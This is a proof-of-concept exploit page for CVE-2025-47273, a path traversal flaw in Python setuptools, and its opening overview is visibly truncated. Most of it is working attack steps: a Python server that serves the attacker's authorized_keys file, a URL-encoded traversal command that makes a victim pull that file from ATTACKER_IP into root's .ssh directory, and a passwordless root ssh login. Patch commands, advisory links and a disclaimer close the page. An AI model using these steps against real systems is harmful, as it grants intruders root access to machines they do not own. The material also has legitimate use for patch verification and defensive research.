Share
## https://sploitus.com/exploit?id=4AF38BD3-3ABD-5ED4-85FB-5FBDA807E30A
# setuptools Path Traversal CVE-2025-47273

## ๐Ÿ“– Overview

Proof-of-concept exploit for a path traversal vulnerability in **Python setuptools  python_server.py << 'EOF'
import http.server
import socketserver

class Handler(http.server.SimpleHTTPRequestHandler):
    def do_GET(self):
        # Serve authorized_keys regardless of path requested
        self.send_response(200)
        self.end_headers()
        with open("authorized_keys", "rb") as f:
            self.wfile.write(f.read())

with socketserver.TCPServer(("", 80), Handler) as httpd:
    httpd.serve_forever()
EOF

python3 python_server.py
```

---

### ๐Ÿ’ฅ Step 3 โ€” Trigger the path traversal (Victim Machine)
```bash
ATTACKER_IP="192.168.1.20"
TARGET_USER="root"

sudo python3 /path/to/vulnerable_script.py \
  "http://${ATTACKER_IP}/%2f${TARGET_USER}%2f.ssh%2fauthorized_keys#egg=evil-1.0"
```

---

### ๐Ÿ‘พ Step 4 โ€” Login as root (Attacker Machine)
```bash
ssh root@VICTIM_IP
```

No password. Direct root shell. ๐Ÿ”‘

---

## ๐Ÿ”’ Patch

Version 78.1.1 fixes the issue. 

| Package Manager | Command |
|---|---|
| ๐Ÿ pip | `pip install --upgrade setuptools` |
| ๐Ÿง Debian/Ubuntu | `sudo apt upgrade python3-setuptools` |
| ๐ŸŽฉ RHEL/Fedora | `sudo dnf upgrade python3-setuptools` |
| ๐Ÿ—๏ธ Manual | [setuptools releases](https://github.com/pypa/setuptools/releases) |


---

## ๐Ÿ“Ž References

- ๐Ÿ”— [NVD โ€” CVE-2025-47273](https://nvd.nist.gov/vuln/detail/CVE-2025-47273)
- ๐Ÿ”— [GitHub Advisory โ€” GHSA-5rjg-fvgr-3xxf](https://github.com/pypa/setuptools/security/advisories/GHSA-5rjg-fvgr-3xxf)
- ๐Ÿ”— [setuptools Fix Commit](https://github.com/pypa/setuptools/commit/250a6d17978f9f6ac3ac887091f2d32886fbbb0b)

- ๐Ÿ”— [setuptools poc](https://github.com/pypa/setuptools/issues/4946)

---

## โš–๏ธ Disclaimer and Terms

This Proof of Concept (PoC) code is provided for **educational and authorized penetration testing purposes only**.

- **No permission** is granted to modify, redistribute, or use this code for any other purposes.
- Unauthorized use or modification may be **illegal and unethical**.
- The authors take **no responsibility** for any misuse or damages.